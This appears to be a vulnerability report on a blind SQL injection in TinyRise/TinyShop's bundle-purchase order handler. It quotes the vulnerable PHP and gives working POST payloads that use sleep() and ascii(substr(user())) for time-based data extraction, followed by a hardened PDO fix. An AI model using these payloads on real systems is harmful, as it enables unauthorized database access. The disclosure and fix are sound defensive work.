### Summary:

SQL injection in the latest version of TinyRise

### Details:

simple.php:

```php
$order_type = 2;
}else if($type=="bundbuy"){ // bundle-sale handling
    $product_ids = implode(',', $product_id);
    $num = Filter::int($buy_num[0]);
    $model = new Model("bundling");
    $bund = $model->where("id=$id")->find();
    if($bund){
        $goods_id = $bund['goods_id'];
        $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id,pr.spec")->group("go.id")->findAll();
        $order_products = $this->packBundbuyProducts($products,$num);
    }
```

This code has a SQL injection. First, the `product_id[]` array is joined verbatim:

```php
$product_ids = implode(',', $product_id);
```

Then `$product_ids` is placed directly into the `where` clause:

```php
$products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id,pr.spec")->group("go.id")->findAll();
$order_products = $this->packBundbuyProducts($products,$num);
```

That is where the injection happens. It appears that only blind injection is possible here.

Request URL: http://localhost/tinyshopv1.1/index.php?con=simple&act=order_act

POST data:

```
address_id=2&payment_id=1&user_remark=xxxxx%27&is_invoice=1&invoice_type=0&invoice_title=xxxxxx&type=bundbuy&id=1&product_id[]=sleep(5)
```

Execution is delayed by five seconds. To go on and guess the table, the POST data becomes:

```
address_id=2&payment_id=1&user_remark=xxxxx%27&is_invoice=1&invoice_type=0&invoice_title=xxxxxx&type=bundbuy&id=1&product_id[]=sleep(if(ascii(substr((select user()),1,1))=$NUM,sleep(5),1)))
```

Here `$NUM` is the value that our PHP test script iterates over.

### Proof of vulnerability:
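As an added example (not TinyShop's own code), the fix for the pattern above: every element of `product_id[]` is validated as a plain integer and the `IN (...)` list is built from bound placeholders, so request data never reaches the SQL text. It assumes a PDO connection and does not use the project's `Model` or `Filter` classes.

```php
<?php
// Added example, not part of the TinyShop/TinyRise code base.
// Shows the unsafe pattern from the report beside a hardened version.

// Unsafe: array values are joined verbatim into the SQL string, so an element
// such as "sleep(5)" becomes part of the query.
function buildInClauseUnsafe(array $productIds): string
{
    return "pr.id in (" . implode(',', $productIds) . ")";
}

// Hardened step 1: keep only elements that are plain positive decimal integers.
// Anything else (functions, quotes, parentheses) is dropped, not "escaped".
function sanitizeProductIds(array $productIds): array
{
    $clean = [];
    foreach ($productIds as $value) {
        if (!is_int($value) && !is_string($value)) {
            continue;
        }
        if (!preg_match('/^[1-9][0-9]*$/', (string) $value)) {
            continue;
        }
        $clean[] = (int) $value;
    }
    return array_values(array_unique($clean));
}

// Hardened step 2: bind each id as an integer parameter; the number of
// placeholders is derived from the sanitized list, never from raw input.
// $pdo is an assumed, already-connected PDO instance.
function findBundleProducts(PDO $pdo, array $productIdsFromRequest): array
{
    $ids = sanitizeProductIds($productIdsFromRequest);
    if (empty($ids)) {
        return []; // nothing valid was submitted, so do not query at all
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT go.*, pr.id AS product_id, pr.spec "
         . "FROM goods AS go LEFT JOIN products AS pr ON pr.goods_id = go.id "
         . "WHERE pr.id IN ($placeholders) GROUP BY go.id";
    $stmt = $pdo->prepare($sql);
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT); // positional, 1-based
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample input mirroring the report's payload shape:
// sanitizeProductIds(['sleep(5)', '3', '3', '7']) keeps only the numeric ids.
```

Applied to the controller, `$product_id` from the request would go through `sanitizeProductIds()` before any query is built, and the framework's query builder would receive bound values rather than an interpolated string.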